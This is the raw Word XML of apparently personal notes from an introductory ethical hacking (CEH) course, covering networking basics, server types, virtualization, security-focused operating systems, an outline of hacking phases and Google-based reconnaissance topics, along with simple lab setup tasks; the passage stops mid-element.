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23DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>09-09-2021, THURSDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000002" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000003" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>ETHICAL HACKING (CEH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000004" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000005" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000006" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. TECHNICAL ASPECTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000007" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">3. NETWORKING ASPECTS (PROTOCOLS, PORT NUMBERS, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>IP )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00000008" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4. SERVER ASPECTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000009" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>5. VIRTUALISATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>6. CHOOSING OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>7. LINUX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>8. STEPS IN ETHICAL HACKING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000000E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">OFFENSIVE | DEFENSIVE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000000F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000010" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>DEFENSIVE - CCNA, MCITP, AWS, SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000011" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>OFFENSIVE - CEH, CPT, OSCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000012" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000013" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>PROTOCOLS - TCP / UDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000014" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>They are communication protocols that explain how data can be transferred from one device to another device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000015" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000016" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000017" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000018" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Two devices when they need to communicate with each other, they can use either anyone of the communication protocols like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000019" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000001A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>PORT NUMBERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000001C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>port is an entry or exit point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000001E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Physical ports - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, serial port, parallel </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000001F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Logical ports - which we </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> see</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000020" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000021" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Protocols (http, https, ftp, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>imap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>...) uses specific port for sending and receiving traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000022" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000023" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>and that port is assigned a number which is called port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000024" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000025" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>0 - 65535</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000026" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>System reserved 0 - 1023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000027" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000028" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>port can be open or closed for security reason</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000029" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000002A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Private </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp; Public IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000002D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>SERVER ASPECTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000002F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mail server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000030" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>web application server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000031" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>ftp server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000032" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>CMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000033" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000034" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Windows server, nginx, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, samba, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>drupal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>joomla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000035" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000036" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000037" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TO DO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000038" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">1. Turn off port 443 in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> computer using inbuilt firewall of windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000039" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">try accessing websites in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">2. configure a website using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000003B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">3. configure a simple python server in kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virutal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> box and share files to windows (host machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">4. configure a simple </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server in kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of virtual box and share files to windows (host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000003D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">5. Host a website in windows using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xampp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000003E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000003F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Note - use turnkey Linux for downloading different servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000040" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000041" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00000042" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>13-09-2021, MONDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000043" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000044" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>VIRTUALISATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000045" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000046" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000047" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Virtual Box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000048" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vmware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000049" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Cloud-based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GenyMotion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000004B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000004C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Need for virtualization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- To create a virtual lab environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- To create a sandboxed environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000004F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000050" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>CHOOSING OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000051" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000052" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>CEH</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Backtrack, Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000053" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>PENTESTING</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Black Arc (29GB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000054" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>WIRELESS / RF</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>PARROT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000055" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>FORENSICS</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>deft, sans, swift</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000056" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000057" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>BACKTRACK 1,2,3,4,5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000058" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>BACKTRACK 5 R1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000059" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>BACKTRACK 5 R2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>BACKTRACK 5 R3 (LAST VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000005C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>KALI LINUX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000005E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>STEPS IN ETHICAL HACKING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000005F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. SOCIAL ENGINEERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000060" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. INFORMATION GATHERING | ENUMERATION | RECONNAISSANCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000061" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3. SCANNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000062" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4. VULNERABILITY ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000063" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>5. EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000064" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>6. PRIVILEGE ESCALATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000065" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>7. MAINTAINING ACCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000066" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>8. COVERING TRACKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000067" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000068" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000069" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. INFORMATION GATHERING | ENUMERATION | RECONNAISSANCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>A. GOOGLE BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>B. OTHER SEARCH ENGINE BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>C. SYSTEM BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>D. WEBSITE BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>E. BROWSER ADD ON BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000006F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>F. SOFTWARE-BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000070" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>G. OS BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000071" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>H. SOCIAL MEDIA-BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000072" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000073" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000074" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>A. GOOGLE BASED INF GATHERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000075" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- How database works?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000076" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Importance of keywords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000077" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Google database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000078" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Google dorks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000079" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Usage of google dorks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000007A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- countermeasures of google dorks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000007B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Google and other products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000007C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000007D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000007E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>GOOGLE DATABASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000007F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Spiders - Architecture of google</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000080" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Crawlers - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a program or ability of google to crawl or retrieve information from any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wbesite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> based on user search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000081" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000082" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Search Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000083" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Relevant results - Google </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>didnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> understand they user input search query, so it tries to a similar result to the keywords </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whats</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> being typed in the search box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000084" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Exact results - What exactly the user is looking for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000085" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000086" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
